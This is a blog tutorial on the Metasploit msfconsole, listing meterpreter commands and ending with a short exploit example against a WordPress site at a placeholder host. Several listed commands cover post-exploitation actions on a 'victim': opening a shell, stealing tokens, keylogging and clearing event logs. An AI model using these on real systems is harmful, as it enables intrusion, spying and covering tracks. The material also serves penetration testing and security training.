Metasploit (Using msfconsole interface) – All things in moderation

Metasploit (Using msfconsole interface)

1. Introduction


In the previous post, I explained how to install Metasploit. In this post, I'll show how to use msfconsole.
So, what is msfconsole?
The msfconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an “all-in-one” centralized console and allows you efficient access to virtually all of the options available in the MSF. Msfconsole may seem intimidating at first, but once you learn the syntax of the commands you will learn to appreciate the power of utilizing this interface.

2. MsfConsole Commands


  • Core commands
? - help menu
background - moves the current session to the background
bgkill - kills a background meterpreter script
bglist - provides a list of all running background scripts
bgrun - runs a script as a background thread
channel - displays active channels
close - closes a channel
exit - terminates a meterpreter session
help - help menu
interact - interacts with a channel
irb - go into Ruby scripting mode
migrate - moves the active process to a designated PID
quit - terminates the meterpreter session
read - reads the data from a channel
run - executes the meterpreter script designated after it
use - loads a meterpreter extension
write - writes data to a channel
  • System commands
clearev - clears the event logs on the victim's computer
drop_token - drops a stolen token
execute - executes a command
getpid - gets the current process ID (PID)
getprivs - gets as many privileges as possible
getuid - get the user that the server is running as
kill - terminate the process designated by the PID
ps - list running processes
reboot - reboots the victim computer
reg - interact with the victim's registry
rev2self - calls RevertToSelf() on the victim machine
shell - opens a command shell on the victim machine
shutdown - shuts down the victim's computer
steal_token - attempts to steal the token of a specified (PID) process
sysinfo - gets the details about the victim computer such as OS and name
  • Networking commands
ipconfig - displays network interfaces with key information including IP address, etc.
portfwd - forwards a port on the victim system to a remote service
route - view or modify the victim routing table
  • User Interface commands
enumdesktops - lists all accessible desktops
getdesktop - get the current meterpreter desktop
idletime - checks to see how long since the victim system has been idle
keyscan_dump - dumps the contents of the software keylogger
keyscan_start - starts the software keylogger when associated with a process such as Word or browser
keyscan_stop - stops the software keylogger
screenshot - grabs a screenshot of the meterpreter desktop
set_desktop - changes the meterpreter desktop
uictl - enables control of some of the user interface components
  • Database backend commands
    creds             List all credentials in the database
    db_connect        Connect to an existing database
    db_disconnect     Disconnect from the current database instance
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache
    db_status         Show the current database status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

3. Using Metasploit (msfconsole) exploits

Search exploit name

use exploit

Using an exploit also adds more options to the ‘show’ command.

Show options

Show targets

Show payloads

Show evasion

Show advanced

Exploit example:

use exploit/unix/webapp/wp_admin_shell_upload
set RHOST example.com
set RPORT 80
set TARGETURI /
exploit
